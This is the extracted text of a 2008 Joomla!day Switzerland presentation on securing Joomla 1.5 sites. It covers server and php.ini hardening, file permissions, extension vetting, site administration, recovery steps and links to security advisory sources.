joomladay switzerland - security

Joomla! 1.5 Security

Joomla!day Presentation

Luzern, Switzerland

15 November 2008

Is Joomla! safe?

Is the World Wide Web Safe?

You know, I don't mean any disrespect, but I had to chuckle by the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear?

Is Joomla! safe?

Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a

7

I would say - anyone who tells a community that a Web site or a out of the box solution

is safe is not being responsible. No, it is not "safe" on the Internet.

8Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a

What is this presentation about?

• Getting Started• Hosting and Server Setup• Joomla Setup• Site Administration• Site Recovery

Presentation overview

Presentation approach taken from http://docs.joomla.org/Category:Security_Checklist

11

Getting started

12

Getting started

13

Getting started

Some basic things before we go into details:• Report (possible) hack to JSST

http://developer.joomla.org/security/contact-the-team.html

• Please don’t report hacks or proof-of-concepts out in the open, also report them to JSST

• Stay informed!– Automatic Email Notification

http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews

– RSS feedhttp://feeds.joomla.org/JoomlaSecurityNews

14

Getting started

15

Hosting and server set up

Shared hosting?

Or

Dedicated hosting?

16

Hosting and server set up

“register_globals”

“open_basedir”

• Configure Apache:– Secure important areas with .htaccess– Use mod_rewrite and mod_security to block

PHP attacks

• Configure MySQL– Implement user accounts with “need-to-know”

principle

• Configure PHP– Use PHP 5!– Configure your php.ini file properly (most of the

times limited with shared hosts)17

Hosting and server set up

• Configure php.ini– Use “disable_functions” to disable dangerous

PHP functions that are not needed by your site.– “Use PHP open_basedir”– Don't use “PHP safe_mode” (it gives a false

sense of security)– Don't use “PHP register_globals”– Don't use “PHP allow_url_fopen”. This option

enables the URL-aware fopen wrappers that enable accessing URL object like files.

18

19

Joomla! setup

• Some basic rules to think about:– Only install official Joomla! versions!

– Change the default administrator username

– Protect directories and files• Move crucial files outside public directory

http://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F

• Ensure that all configurable paths to writable or uploadable directories

• Protect your log directory (moving it out of document root or .htaccess protect it)

– Adjust file and directory permissions• Set critical directories to 755

• Set file permissions to 644

– Remove unneeded files 20

Joomla! setup

21

Joomla! setup

• Before you install extensions– Always backup (even on your test system)– Always test before you install on your life server– Check for extension vulnerabilities– Download from trusted sites– User beware! Check the code quality– Test! Test! Test!– Remove junk files (all that is not needed)– Avoid encrypted code

22

Joomla! setup

23

Site administration

• Use well-formed passwords• Maintain a strong site backup process• Monitor crack attempts (tripwire, SAMHAIN)• Perform manual intrusion detection (manual

logfile scan)• Stay current with security patches and

upgrades

24

Site administration

• Get help the right way• Follow a logical and rigorous recovery

process • Reset your administrator password (and all

admins/super admins)• Find exploit attempts using the *NIX shell

25

Site recovery

26

Links

• Documentation wiki : http://docs.joomla.org/Category:Security_Checklist

• Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html

• Report issues to JSST : http://developer.joomla.org/security/contact-the-team.html

27

Links

Joomla! related

• www.joomla.org

• developer.joomla.org/security.html

• www.secunia.org

• www.milw0rm.com

Sites to put RSS feeds on

• http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews

General

• www.us-cert.gov

• www.frsirt.com

Operating systems related

• www.debian.org/security

• www.openbsd.org/security

• www.redhat.org/apps/support

28

Sites to monitor when you take security seriously

Joomla!

“All together”

30

Questions?